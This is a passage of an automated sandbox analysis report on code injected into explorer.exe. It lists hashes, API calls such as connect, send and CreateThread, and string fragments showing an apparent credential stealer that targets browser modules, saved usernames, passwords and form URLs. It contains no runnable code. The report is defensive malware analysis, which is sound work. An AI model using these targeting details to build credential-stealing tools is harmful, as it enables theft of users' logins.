                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction ID: 3098f6ee6b116dcfd8e5817c956b2396a54fdab6a6aa507c2301cdfdd287c040
                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction Fuzzy Hash: B9014C70618B188FCB94EF1CE088B55B7E0EB58314F1545AE990DCB226C774C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 294 e74a732-e74a768 295 e74a788-e74a7ab connect 294->295 296 e74a76a-e74a782 call e74d942 294->296 296->295
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction ID: 9e4019a85937fe3c97f768a11216037b63b2d454b8be5501f929ad3a87270861
                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction Fuzzy Hash: EC012C70618A1C8FCB98EF5CE088B55B7E0FB59314F1545AEA90DCB226DB74CD818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 407 e74a6b2-e74a6e5 408 e74a705-e74a72d send 407->408 409 e74a6e7-e74a6ff call e74d942 407->409 409->408
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: send
                                          • API String ID: 2809346765-2809346765
                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction ID: cf8b99fdddef0e4df359dfb0a314980ed6e5efd93393e35b0aa01ea2d2f03df5
                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction Fuzzy Hash: C701127055CA188FDB98EF1CD448B2577E0EB58314F1545AED85DCB266D670D8818B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 412 e74a5b2-e74a5ea 413 e74a5ec-e74a604 call e74d942 412->413 414 e74a60a-e74a62b socket 412->414 413->414
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: sock
                                          • API String ID: 98920635-2415254727
                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction ID: b51f5cd48a23e4ea99ed5368636c90eac840d45977e5eeceb466b6b2ea5d6e69
                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction Fuzzy Hash: C4012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB276D7B0C9818B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 417 e7422dd-e742320 call e74d942 420 e742326 417->420 421 e7423fa-e74240e 417->421 422 e742328-e742339 SleepEx 420->422 422->422 423 e74233b-e742341 422->423 424 e742343-e742349 423->424 425 e74234b-e742352 423->425 424->425 426 e74235c-e74236a call e74cf12 424->426 427 e742354-e74235a 425->427 428 e742370-e742376 425->428 426->428 427->426 427->428 430 e7423b7-e7423bd 428->430 431 e742378-e74237e 428->431 434 e7423d4-e7423db 430->434 435 e7423bf-e7423cf call e742e72 430->435 431->430 433 e742380-e74238a 431->433 433->430 438 e74238c-e7423b1 call e743432 433->438 434->422 437 e7423e1-e7423f5 call e7420f2 434->437 435->434 437->422 438->430
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction ID: 57632453a1b4283bbbd15caacf74282c0764bc553fdfe42aa30427c466b721f2
                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction Fuzzy Hash: 27316BB0614B89DFDB64EF6980882A5B7B1FB54300F44467ED92DCB127CB7498A0CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 453 e742412-e742446 call e74d942 456 e742473-e74247d 453->456 457 e742448-e742472 call e74fc9e CreateThread 453->457
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547308540.000000000E6B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e6b0000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction ID: 4112837df2c075012d48108ed7cef860a2a922648eea7cf36a3bdf2313912466
                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction Fuzzy Hash: 78F0C270268A484FD788EF2CD44562AF3D0EBE9214F440A3EA98DC3265DA29C9824716
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                          • API String ID: 0-393284711
                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction ID: b2a75cd76f74d11aec05d5afb279a019a01dea7567e238e152d877e62ad4b584
                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction Fuzzy Hash: 6DE16D70518F588FC769EF68D4947ABB7E1FB98300F404A2E95ABC7281DF30A901CB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                          • API String ID: 0-2916316912
                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction ID: 2ffc0c1b5c371726df0591d79ca5f336ad743b038712e94e72484be43c1e825f
                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction Fuzzy Hash: B6B15E30518B488EDB59EF68D489AEEB7F1FF98300F50891ED49AC7291EF709905CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                          • API String ID: 0-1539916866
                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction ID: ffbbbfd29725afc75f16ec463d16e7afe20ecc294d865a26257c2a5aabf88fb7
                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction Fuzzy Hash: A741BE70A18B18CFDB18DF88A4596BE7BE2FB89700F00025ED809D3385DBB59D458BD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                          • API String ID: 0-355182820
                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction ID: f1c9f85365a634892f2db9e2f73eda8c99a84def0e88a00f7048ce8754656506
                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction Fuzzy Hash: 15C16D70618B198FC75CEF64D495ADBF3E1FB98304F404A2E95AAC7250DF30A915CB8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                          • API String ID: 0-97273177
                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction ID: 3463bcc218511c57343692e12ed4988b5290904f45cf0a3e8cc87d15b1bc3fed
                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction Fuzzy Hash: 8D51A2316187488FD71DDF18D4856ABB7E5FBC5700F501A2EE89B87282DBB49906CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction ID: 71cbe13576314dd0da3d4eeae95855a0bcbfaa1a074db1de02439ee18b53a670
                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction Fuzzy Hash: E3C19470618A298FC75CEF68E455AABB3E1FF98300F45472D940AC7295DF309D01CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction ID: 4cf579ba5ee6b65db5b5a1877b5ac32823e992a82ab9660a8bb6c10575faf7da
                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction Fuzzy Hash: E0C18470618A294FC75CEF68E455AEAB3E1FF98300F45472D944AC7295DF30AE058B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction ID: 175208e65fcd98e6419fd83ea8025b923138f5a511d302ddc1820acb28cee595
                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction Fuzzy Hash: 77A1B1706187588FDB29EF68E4447EEB7E1FF98300F404A2DE48AD7291EF7099458789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction ID: 94b4d155b6cdf8942c78e029983ce60070ddd7038a86361e1059a7381f1d860e
                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction Fuzzy Hash: C09181706187588FDB29EFA8E4447EEB7E1FF98300F40462DE44AD7291DF7099458789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$e$n$v
                                          • API String ID: 0-1849617553
                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction ID: ea9b7dd55037a2bc9f7b8d5a0ae135b9353c08abe2796b76f0796ede774e0d7a
                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction Fuzzy Hash: 6F71A231618B488FD759EFA8D4847AAB7F1FF98305F000A2ED44AC72A1EB71DD458B85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                          • API String ID: 0-1970020201
                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction ID: 659249ed5ae0f4c8da96b12d9a1093d5a08f2b9bcefba7958f67e40e6ccb7d6d
                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction Fuzzy Hash: F2516EB0918B4C8FDB55EFA4D045AEEB7F1FF58300F404A2E959AE7254EF3095418B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4$\$dll$ion.$vers
                                          • API String ID: 0-1610437797
                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction ID: 74bd294aed3119d28e009dfc00f03828702b41dbac5e61af7588a519ed89ae4d
                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction Fuzzy Hash: BC416F30218B488FCB69EF6498557EB73E5FF98301F454A2E999EC7240EF30D9058B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 32.d$cli.$dll$sspi$user
                                          • API String ID: 0-327345718
                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction ID: 4e57932f35acf4b7ebb6078e1848906616329b616556b2b1974dcd2593548209
                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction Fuzzy Hash: 53418D70A19E1D8FCB59EF68A0953AE73E5FB59300F40056EA80ADB381DA30D941CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$el32$h$kern
                                          • API String ID: 0-4264704552
                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction ID: 92a81f326cb1ce124c108c529b0aefd14f1425c50abb5464053d5e3d38f3b3cc
                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction Fuzzy Hash: 2B41AF70608B488FDB68DF2880883BAB7E1FB98301F104A2ED69EC3655DB70C845CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction ID: af852fd49e9efeaac839150272a37fdd4ca1fc6158635bc40a36dda397b24a73
                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction Fuzzy Hash: F031C37151CB485FD71AEB68D4846DBB7D4FB84300F504D1EE49BC7292EE30A94ACB46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction ID: 1176a9991082e4923ac8954ff2b343783543a160d8584bc7878a370cb16b6e74
                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction Fuzzy Hash: AC31C271518B486FD72DEB28D4946EBB7D4FB94300F504D2EE49BC7292EE30E906CA46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction ID: 35f9c43a98aff7ffe2ef822c62505e7f14d581a7c957be029b1f8c26350f52d9
                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction Fuzzy Hash: 8A314C30118B684FCB88EB689494BABB7E1FBD8300F84492D944AC7295DF30CA45C756
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction ID: 5059fa77b8ffe144857036e20b283e32e2b16a5c6040016fdacf2dd6f362d4d9
                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction Fuzzy Hash: 2A313C70118B684FC798EF689494BABB7E1FFD8300F844A2D944AC7295DF30CA45C756
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: 68f91156532714606da0086161c8649a4ae498728fdbb13b9cd96c36683e110d
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 6031D131614A1C8FCB18EFA8D8887EEB7E1FB58305F40462ED45ED7280DE749A45C789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 75d1d95a47e5991358bc3cb7c6b1faf28292f8f39c1a8d638d741058cfcc8492
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: E821C330A10A1C8ACB19EFA8D8447EE7BE1FF58304F40462ED45AD7280DE749A058789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction ID: a44b73b897b831d7d8758ed42f12516256e4740ee038f181c7bdc5e423831b01
                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction Fuzzy Hash: CF217C70A24B1D9BDB48EFA8D0447EEBBF1FB58300F504A2ED019D3650DB7499518B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction ID: 466dba2ed33f5434a1090e1b4c88d11abfda453ef94a50df83ddd6f615c34ef5
                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction Fuzzy Hash: DA218B70A24A1D9BDB48EFA8E0447EEBBF1FB58300F504A2ED019D3680DB7499518B88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.4547170174.000000000E5D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E5D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_e5d0000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: auth$logi$pass$user
                                          • API String ID: 0-2393853802
                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction ID: af0ab2e8aefb2fb5de7fbf4c6139f8863f88c0b46773d32dfe7edd6a882cc79f
                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction Fuzzy Hash: 1821C030624B0D8BCB09DF99E8906EFB7E1EF88344F004619E40ADB384D7B1D9548BC6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.1%
                                          Dynamic/Decrypted Code Coverage:1.9%
                                          Signature Coverage:0%
                                          Total number of Nodes:647
                                          Total number of Limit Nodes:84
